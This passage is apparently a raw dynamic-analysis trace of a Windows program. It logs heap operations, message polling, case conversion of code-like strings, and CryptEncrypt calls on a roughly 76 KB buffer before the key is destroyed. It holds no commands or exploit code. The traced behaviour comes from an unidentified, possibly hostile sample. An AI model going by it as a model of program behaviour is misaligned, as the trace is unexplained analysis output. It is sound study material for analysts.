| out: hHeap=0x25c0000) returned 1 [0195.707] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.707] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0195.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0195.707] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0195.708] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0195.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0195.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0195.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0195.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0195.708] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0195.708] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0195.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0195.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0195.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0195.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0195.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0195.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0195.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0195.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0195.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0195.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0195.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0195.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0195.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0195.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0195.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0195.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0195.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0195.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34d4c30 | out: hHeap=0x25c0000) returned 1 [0195.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0195.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0195.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0195.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0195.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0195.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.711] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0195.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0195.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0195.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0195.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0195.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0195.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0195.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0195.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0195.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.712] CryptEncrypt (in: hKey=0xaa5960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x129d0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x129d8) returned 1 [0195.712] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.712] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.713] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.713] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.713] CharLowerBuffW (in: lpsz="byte[76248]", cchLength=0xb | out: lpsz="byte[76248]") returned 0xb [0195.713] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.714] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.714] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.714] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.714] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.714] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.714] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.714] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.714] CryptEncrypt (in: hKey=0xaa5960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34d4c30*, pdwDataLen=0x8bef68*=0x129d0, dwBufLen=0x129d8 | out: pbData=0x34d4c30*, pdwDataLen=0x8bef68*=0x129d8) returned 1 [0195.715] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.715] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.715] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.715] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.716] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.759] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.759] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.759] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0195.759] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.759] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0195.759] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.759] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.759] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0195.759] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.759] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0195.760] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.760] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.760] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.760] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.760] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0195.760] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.760] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0195.760] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.760] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.760] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.760] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.760] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.763] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.763] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.763] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.766] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.766] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.766] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0195.766] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0195.766] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0195.766] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0195.766] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0195.766] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.766] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0195.766] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.766] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0195.767] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0195.767] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.767] CryptDestroyKey (hKey=0xaa5960) returned 1 [0195.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0195.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0195.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0195.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0195.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0195.767] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0195.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0195.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0195.767] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0195.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0195.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0195.767] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0195.767] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0195.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0195.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0195.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0195.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0195.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0195.768] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0195.768] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0195.768] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0195.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0195.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0195.768] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0195.768] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0195.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0195.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0195.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0195.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0195.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0195.768] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0195.768] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0195.768] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0195.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0195.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0195.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0195.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0195.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0195.768] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0195.768] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0195.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0195.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0195.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0195.769] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0195.769] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0195.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0195.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0195.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0195.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0195.769] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0195.769] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0195.769] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 